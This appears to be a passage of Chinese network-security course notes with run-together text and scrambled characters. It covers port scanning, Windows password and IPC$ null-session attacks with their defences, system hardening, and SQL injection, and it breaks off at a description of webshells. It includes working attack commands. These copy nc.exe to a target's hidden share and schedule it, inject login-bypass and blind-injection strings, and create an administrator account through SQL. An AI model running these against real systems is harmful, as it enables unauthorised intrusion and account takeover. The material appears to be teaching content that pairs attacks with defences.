扫描器SYNSYNSYNSYN+ACK握手RST重置没有回应或者其他利用TCP三次握手的第一次进行扫描。半连接SYN扫描(TCPSYN扫描)TCPSYN扫描Halfopenscan在3次握手完成前终止连接方法发SYN如果收到RST，说明端口关闭如果收到SYNACK，说明端口开放，发送RST优点应用程序日志没有记录缺点复杂，需要自己构造数据包很多系统要超级用户才能进行容易被发现ClientACKServerRSTClientACKServer--端口开放端口关闭隐蔽扫描：ACK隐蔽扫描：FINClientFINServerRSTClientFINServer--未监听端口在监听端口3.4端口扫描工具NmapXscanSuperScanShadowSecurityScannerMS06040ScannerNmap——探测工具王功能 NMAP是探测网络主机和开放效劳的佼佼者。是Linux下使用者的最爱，现在已经有Windows的版本。NMAP支持多种协议的扫描如UDP，TCPconnect,TCPSYN,ftpproxy(bounceattack),Reverse-ident,ICMP(pingsweep),FIN,ACKsweep,XmasTree,SYNsweep,和Null扫描。还提供一些实用功能，比方通过tcp/ip来甄别操作系统类型；秘密扫描、动态延迟和重发；欺骗扫描、端口过滤探测、分布扫描等。-sTTCPConnect()扫描 这是对TCP的最根本形式的侦测。对目标主机端口进行试探，如果该端口开放，那么连接成功，否那么代表这个端口没有开放。-sSTCPSYN扫描 就是我们介绍的‘半开’式的扫描，速度会比connect扫描快。-sF-sX–sN StealthFIN,XmasTree或者Null扫描模式。-sPPing扫描 对指定的IP发送ICMP，如果对方屏蔽了echorequest，nmap还能发送一个TCPack包到80端口探测。-sUUDP扫描 确定某个UDP端口是否翻开。xscan选择‘无条件扫描’，才可以突破防火墙屏蔽ping，进行端口扫描。Superscan——速度之王

MS06040Scanner——专用的漏洞扫描器用于检测目标系统是否存在MS06040漏洞。MS06040Scanner的工作原理是首先是通过端口扫描和操作系统扫描获取操作系统类型和开放的端口，如果是windows2000系统，开放了TCP139或者TCP445端口，并且返回的数据包跟漏洞库里的定义相匹配，那么说明该主机可能可能存在MS06040漏洞，我们就可以使用MS06040漏洞利用程序对其进行远程溢出攻击。4.推荐平安站点平安焦点绿盟科技浪客联盟红客联盟剑鹰网络平安小组中国X黑客小组中华网络平安联盟中国黑客入侵组中国黑客联盟黑客基地黑客防线第四章基于windows操作系统的攻击与防御1.windows系统口令攻击

口令攻击主要采用以下几种方法：猜测攻击字典攻击穷举攻击混合攻击直接破解系统口令文件网络嗅探(sniffer)键盘记录中间人攻击社会工程学1.1Windows操作系统的口令破解技术

1.输入法漏洞

windows2000sp2之前的版本。 目前的Vista操作系统，极点五笔输入法，也存在此类问题。2.暴力破解SAM文件，一般使用工具LC3.删除SAM文件1.2设置系统策略保护口令连接策略问题：默认情况下系统没有设置登录的失败次数限制，导致可以被无限制地尝试连接系统管理的共享资源。解决方法：设置用户的访问策略，定义用户登录失败到达一定次数时锁定帐号，并限制管理员远程访问。如何实现？在“管理工具〞中，选择本地平安策略。在本地平安策略中选择“帐户平安策略〞，其中的“密码策略〞可以对密码的长度、密码的存留时间等方面进行设置。比方：在“密码必须符合复杂性要求〞的选项中，系统默认是停用该功能，但推荐用户在使用时将该功能开启。点击“帐户锁定策略〞，可以看到三个被选项，这里可以对帐户的时间和帐户无效访问的次数进行设置。此处，我们点击“用户锁定阈值〞点右键，选择“平安性〞，此处就可以对用户无效访问次数进行限制。由于Administrator帐号的特殊性，Administrator帐号无法设置帐号锁定，即使登录失败的次数到达设置时，该帐号也不可能被锁住。因此除了系统默认创立的Administrator帐号，还应该创立至少一个具有管理员特权的帐号，并且，把默认帐号Administrator改成另外一个名字。2.IPC$入侵

2.1什么是IPC IPC是英文InternetProcessConnection的缩写，即：命名管道，它是windows提供的一个通信根底，用来在两台计算机进程之间建立通信连接，而IPC后面的$是windows系统所使用的隐藏符号，因此IPC$表示IPC共享，但是是隐藏的共享。默认IPC是共享的。通过IPC连接，入侵者就能够实现远程控制目标主机。根底知识SMB:(ServerMessageBlock)Windows协议族，用于文件打印共享的效劳；NBT:(NETBiosOverTCP/IP)使用137〔UDP〕138〔UDP〕139〔TCP〕端口实现基于TCP/IP协议的NETBIOS网络互联。在WindowsNT中SMB基于NBT实现，即使用139〔TCP〕端口；而在Windows2000中，SMB除了基于NBT实现，还可以直接通过445端口实现。网络共享对于端口的选择对于win2000客户端〔发起端〕来说：1如果在允许NBT的情况下连接效劳器时，客户端会同时尝试访问139和445端口，如果445端口有响应，那么就发送RST包给139端口断开连接，用455端口进行会话，当445端口无响应时，才使用139端口，如果两个端口都没有响应，那么会话失败；2如果在禁止NBT的情况下连接效劳器时，那么客户端只会尝试访问445端口，如果445端口无响应，那么会话失败。对于win2000效劳器端来说：1如果允许NBT,那么UDP端口137,138,TCP端口139,445将开放〔LISTENING〕；2如果禁止NBT，那么只有445端口开放。我们建立的ipc$会话对端口的选择同样遵守以上原那么。显而易见，如果远程效劳器没有监听139或445端口，ipc$会话是无法建立的。2.2空会话〔NullSession〕攻击概念：Null会话是同效劳器建立的无信任支持的会话。一个会话包含用户的认证信息，而Null会话是没有用户的认证信息，也就好比是一个匿名的一样。作用：当在多域环境中，要在多域中建立信任关系，首先需要找到域中的pdc来通过平安通道的密码验证，使用空会话能够非常容易地找到pdc，还有就是关于一些系统效劳的问题。而且Lmhosts的#include就需要空会话的支持。攻击过程：1).用扫描软件搜寻存在弱口令的主机比方流光，SSS，X-scan等，然后锁定目标，如果扫到了管理员权限的口令，假设现在得到了administrator的密码为空2).然后，我们先建立起ipc$连接

netuse\\\ipc$""/user:administrator3).查看远程主机开了什么共享

netview

注释：声明用netview命令无法看到默认共享，因此通过上面返回的结果，并不能判断对方是否开启了默认共享。4).查看远程主机的时间

nettime

5).得到远程主机的netbios用户名列表nbtstat

Copye:\nc.exe\\5\c$上传文件nc.exe到目标地址的c盘At14:03c:\nc.exe指定在目标地址上在14:03执行程序nc.exe以下是一些常见的导致ipc$连接失败的原因：1IPC连接是WindowsNT及以上系统中特有的功能，由于其需要用到WindowsNT中很多DLL函数，所以不能在Windows9.x/Me系统中运行，也就是说只有nt/2000/xp才可以相互建立ipc$连接，98/me是不能建立ipc$连接的；2如果想成功的建立一个ipc$连接，就需要对方开启ipc$共享，即使是空连接也是这样，如果对方关闭了ipc$共享，你将会建立失败；3你未启动Lanmanworkstation效劳，它提供网络链结和通讯，没有它你无法发起连接请求〔显示名为：Workstation〕；4对方未启动Lanmanserver效劳，它提供了RPC支持、文件、打印以及命名管道共享，ipc$依赖于此效劳，没有它远程主机将无法响应你的连接请求〔显示名为：Server〕；5对方未启动NetLogon，它支持网络上计算机pass-through帐户登录身份；6对方禁止了NBT〔即未翻开139端口〕；7对方防火墙屏蔽了139和445端口；8你的用户名或者密码错误〔显然空会话排除这种错误〕；9命令输入错误：可能多了或少了空格，当用户名和密码中不包含空格时两边的双引号可以省略，如果密码为空，可以直接输入两个引号“〞即可；10如果在已经建立好连接的情况下对方重启计算机，那么ipc$连接将会自动断开，需要重新建立连接。2.3空会话攻击的防御

有如下方法：HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\restrictanonymous。在Windows2000中将值改为“2〞，表示限制所有的匿名访问，除非明确许可。禁止自动翻开默认共享。 对于Windows2000Pro来说，修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters],把AUTOShareWks〔DWORD〕的键值该为00000000。如果主键不存在，就新建一个再修改键值。 server版:找到如下主键[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters]把AutoShareServer〔DWORD〕的键值改为:00000000。关闭ipc$和默认共享依赖的效劳:server效劳

操作：控制面板-管理工具-效劳-找到server效劳〔右击〕-属性-常规-启动类型-选已禁用

这时可能会有提示说：XXX效劳也会关闭是否继续，因为还有些次要的效劳要依赖于lanmanserver，不要管它。屏蔽139，445端口

由于没有以上两个端口的支持，是无法建立ipc$的，因此屏蔽139，445端口同样可以阻止ipc$入侵。 注意：如果屏蔽掉了以上两个端口，你将无法用ipc$入侵别人。设置复杂密码，防止通过ipc$穷举出密码3NTFS文件系统

3.1优势长文件名支持对文件目录的平安控制先进的容错能力不易受到病毒和系统崩溃的侵袭3.2NTFS权限设置多重权限中应该遵循以下几个原那么：用户对资源的有效权限是分配给该个人用户帐户和用户所属的组的所有权限的总和。如果用户对文件具有“读取〞权限，该用户所属的组又对该文件具有“写入〞的权限，那么该用户就对该文件同时具有“读取〞和“写入〞的权限。文件权限高于文件夹权限。NTFS文件权限对于NTFS文件夹权限具有优先权，假设你能够访问一个文件，那么即使该文件位于你不具有访问权限的文件夹中，你也可以进行访问〔前提是该文件没有继承它所属的文件夹的权限〕拒绝高于其他权限。拒绝权限可以覆盖所有其他的权限。甚至作为一个组的成员有权访问文件夹或文件，但是该组被拒绝访问，那么该用户本来具有的所有权限都会被锁定而导致无法访问该文件夹或文件。也就是说上面第一点的权限累积原那么将失效。4文件系统加密与保护

4.1文件系统加密4.2文件系统保护

Windows2000提供了两种方式对系统文件进行保护，一种是浏览保护，一种是文件保护。浏览保护文件保护 “Windows文件保护〞能阻止替换受保护的系统文件，这些受保护的文件包括.sys、.dll、.exe、.ttf等系统文件。5平安恢复5.1平安恢复造成系统崩溃的原因可能有很多种：硬件问题，硬件的物理损坏导致系统无法工作。病毒破坏，由于病毒、木马软件对系统的破坏造成系统崩溃。程序问题，由于安装新软件产生兼容性问题导致系统崩溃。人为失误，由于人为的操作失误对系统的破坏导致系统无法工作。人为破坏，人为的恶意破坏导致系统的瘫痪。自然灾害，又不可抗拒的问题导致系统崩溃，如火灾等常见的恢复机制主要有以下几点：创立系统紧急修复盘 开始->程序->附件->系统工具->备份定期将系统中的重要数据进行备份5.2平安设置Windows2000的平安子系统由本地平安策略、平安账号管理器、平安证明监视器三局部组成。他们包括如下一些主要组件：平安参考监视器〔SRM，SecurityReferenceMonitor〕：Windows2000执行程序〔\Winnt\System32\Ntoskrnl.exe〕中的一个部件，负责执行对对象的平安访问检查本地平安认证子系统〔Lsass，LocalSecurityAuthoritySubsystem〕：运行在\Winnt\System32\Lsass.exe映像下的用户模式进程，负责本机系统平安策略〔例如，哪个用户允许登录此机，口令策略、用户和组的特权授予和系统平安审计设置等〕、用户认证和发送平安审计消息到事件日志。本机平安授权效劳〔Lsasrv-\Winnt\System32\Lsasrv.dll〕实现了大局部的功能。Lsass策略数据库：包含本机系统平安策略设置的数据库。该数据库存储在注册表HKLM\SECURITY下。平安帐号管理器〔SAMSecurityAccountsManager〕效劳：负责管理包括本机上定义的用户名和组的数据的一组子程序。SAM效劳由\Winnt\System32\Samsrv.dll实现，运行在Lsass进程下。SAM数据库：包含定义的用户和组以及口令及其他属性信息的数据库。该数据库保存在注册表HKLM\SAM下。活动目录〔ActiveDirectory〕：一种目录效劳，包含保存在域中对象信息数据库。域是由一组计算机和它们相关的平安组组成的。活动目录保存域内对象的信息：包括用户、组和计算机。口令信息和域用户和组的特权信息保存在活动目录中。活动目录效劳器由\Winnt\System32\Ntdsa.dll实现，运行在Lsass进程下。登录过程：〔LogonProcess-Winlogon〕：运行\Winnt\System32\Winlogon.exe的用户模式进程。负责响应平安提示序列〔SAS，SecurityAttentionSequence〕和管理交互登录会话。网络登录效劳〔NetLogonService-Netlogon〕：运行在Lsass中的Win32效劳〔\Winnt\System32\Netlogon.dll〕，负责对MicrosoftLANManager2WindowsNT〔前Windows2000〕的网络登录请求进行响应。内核平安设备驱动器〔KsecDD，KernerlSecurityDeviceDriver〕：内核模式函数库，负责实现本地过程调用接口。其他内核模式平安组件，包括加密文件系统，用它同用户模式下的Lsass进行通信。KsecDD位于\Winnt\System32\Drivers\Ksecdd.sys。Windows2000的平安设置可以大致分为用户平安设置、密码平安设置、系统平安设置、效劳平安设置四个方面。用户平安设置禁用Guest帐号。限制不必要的用户。创立两个管理员帐号。把系统Administrator账号改名。把共享文件的权限从Everyone组改成授权用户。开启用户策略。不让系统显示上次登录的用户名。密码平安设置使用平安密码。设置屏幕保护密码。开启密码策略。系统平安设置使用NTFS格式分区。运行防毒软件。关闭默认共享。锁住注册表。利用Windows2000的平安配置工具来配置平安策略。效劳平安设置关闭不必要的端口。设置好平安记录的访问权限。禁止建立空连接。第五章脚本攻击与防御1SQL注入技术什么是SQL注入技术？ SQL注入即是指攻击者通过在应用程序中预先定义好的查询语句结尾加上额外的SQL语句元素，欺骗数据库效劳器执行非授权的任意查询。分析一个经典的SQL注入漏洞dimrsadmin1=request("admin")password1=request("password")setrs=server.CreateObject("ADODB.RecordSet")rs.open"select*fromadminwhereadmin='"&admin1&"'andpassword='"&password1&"'",conn,1ifrs.eofandrs.bofthenresponse.write"<SCRIPTlanguage=JavaScript>alert('用户名或密码不正确！');"response.write"javascript:history.go(-1)</SCRIPT>"response.endelsesession("admin")=rs("admin")session("password")=rs("password")session("aleave")=rs("aleave")response.redirect"admin.asp"endifrs.closesetrs=nothing一个经典的SQL注入漏洞分析在用户名和密码那里都填入‘OR‘’=’，SQL语句被构造成

select*fromadminwhereadmin=‘'OR‘'=‘'

and

password=‘'OR‘'=‘‘意思是当admin为空或者空等于空，password为空或者空等于空的时候整个查询语句就为真。如何来修补漏洞？过滤掉其中的特殊字符。这里我们就过滤掉其中的单引号“'〞，即是把程序的头两行改为：admin1=replace(trim(request("admin")),"'","")password1=replace(trim(request("password")),"'","")判断数据库的类型效劳器的IIS错误提示没关闭提交://localhost/test/onews.asp?id=37’：1、如果是Access数据库，那么应该返回：MicrosoftJETDatabaseEngine错误'80040e14'字符串的语法错误在查询表达式'id=37''中。/onews.asp，行82、如果是SQLServer数据库，那么应该返回：MicrosoftOLEDBProviderforODBCDrivers错误'80040e14'[Microsoft][ODBCSQLServerDriver][SQLServer]字符串''之前有未闭合的引号。/onews.asp，行8效劳器的IIS错误提示关闭了 根据Access和SQLServer自己的系统表来区分。Access是在系统表[msysobjects]中，但在Web环境下读该表会提示“没有权限〞，SQLServer是在表[sysobjects]中，在Web环境下可正常读取。 提交：://localhost/test/onews.asp?id=37and(selectcount(*)fromsysobjects)>0如果是Access数据库，因为不存在sysobjects表，所以返回结果应该和正常页面有很大区别；如果是SQLServer，那么应该返回一个查询成功的正常页面。1.1Access数据库的注入把IE菜单=>工具=>Internet选项=>高级=>显示友好HTTP错误信息前面的勾去掉，这样可以显示出现的错误信息。分析一次完整的SQL注入。<%owen=request("id")

Setrsnews=Server.CreateObject("ADODB.RecordSet")sql="updatenewssethits=hits+1whereid="&cstr(request("id"))conn.executesqlsql="select*fromnewswhereid="&owenrsnews.Opensql,conn,1,1title=rsnews("title")ifrsnews.eofandrsnews.bofthenresponse.Write("数据库出错")else%>://localhost/test/onews.asp?id=37://localhost/test/onews.asp?id=37and1=2 sql=select*fromnewswhereid=37and1=2://localhost/test/onews.asp?id=37and1=1://localhost/test/onews.asp?id=37and0<>(selectcount(*)fromadmin) 猜测是否存在admin表://localhost/test/onews.asp?id=37and1=(selectcount(*)fromadminwherelen(pass)>0)猜测是否存在pass字段://localhost/test/onews.asp?id=37and1=(selectcount(*)fromadminwherelen(password)>0)://localhost/test/onews.asp?id=37and(selectasc(mid(password,1,1))fromadmin)>100假设pssword字段中第一个记录的第一位的ASCII码大于100，如果假设正确那么应该返回正常页面猜测password字段是否存在防止SQL注入(1)在效劳端正式处理之前对提交数据的合法性进行检查；(2)封装客户端提交信息；(3)替换或删除敏感字符/字符串；(4)屏蔽出错信息。第一种方法DimTc_Post,Tc_Get,Tc_In,Tc_Inf,Tc_Xh '定义需要过滤的字串Tc_In="'|;|and|(|)|exec|insert|select|delete|update|count|*|%|chr|mid|master|or|char|declare"Tc_Inf=split(Tc_In,"|")'处理post数据IfRequest.Form<>""ThenForEachTc_PostInRequest.FormForTc_Xh=0ToUbound(Tc_Inf)IfInstr(LCase(Request.Form(Tc_Post)),Tc_Inf(Tc_Xh))<>0ThenResponse.Write"<ScriptLanguage=JavaScript>alert('请不要在参数中包含非法字符尝试注入！');</Script>"'处理get数据IfRequest.QueryString<>""ThenForEachTc_GetInRequest.QueryStringForTc_Xh=0ToUbound(Tc_Inf)IfInstr(LCase(Request.QueryString(Tc_Get)),Tc_Inf(Tc_Xh))<>0ThenResponse.Write"<ScriptLanguage=JavaScript>alert('请不要在参数中包含非法字符尝试注入！');</Script>"1.2SQLServer数据库的注入判断帐号的权限帐户有三种不同的权限：Sa权限、Db_owner权限、Public权限://localhost/test/onews.asp?id=37;and(selectcount(*)fromsysobjects)>0and1=(selectIS_SRVROLEMEMBER(’sysadmin’));--

如果返回正常的话就说明数据库连接帐户是Sa权限and1=(selectIS_MEMBER('db_owner'));--

如果返回正常的话就说明数据库连接帐户就是db_owner权限Sa权限下的注入Web和数据库在一台效劳器上 在这种情况下又可以分为几种情况：没有防火墙阻隔直接拿系统权限;exec'netuserhelen123456/add';--

;exec'netlocalgroupadministratorshelen/add';--

无法直接连接效劳器 取得webshell。 什么是webshell？ 所谓webshell就是一个asp或php木马后门，黑客在入侵了一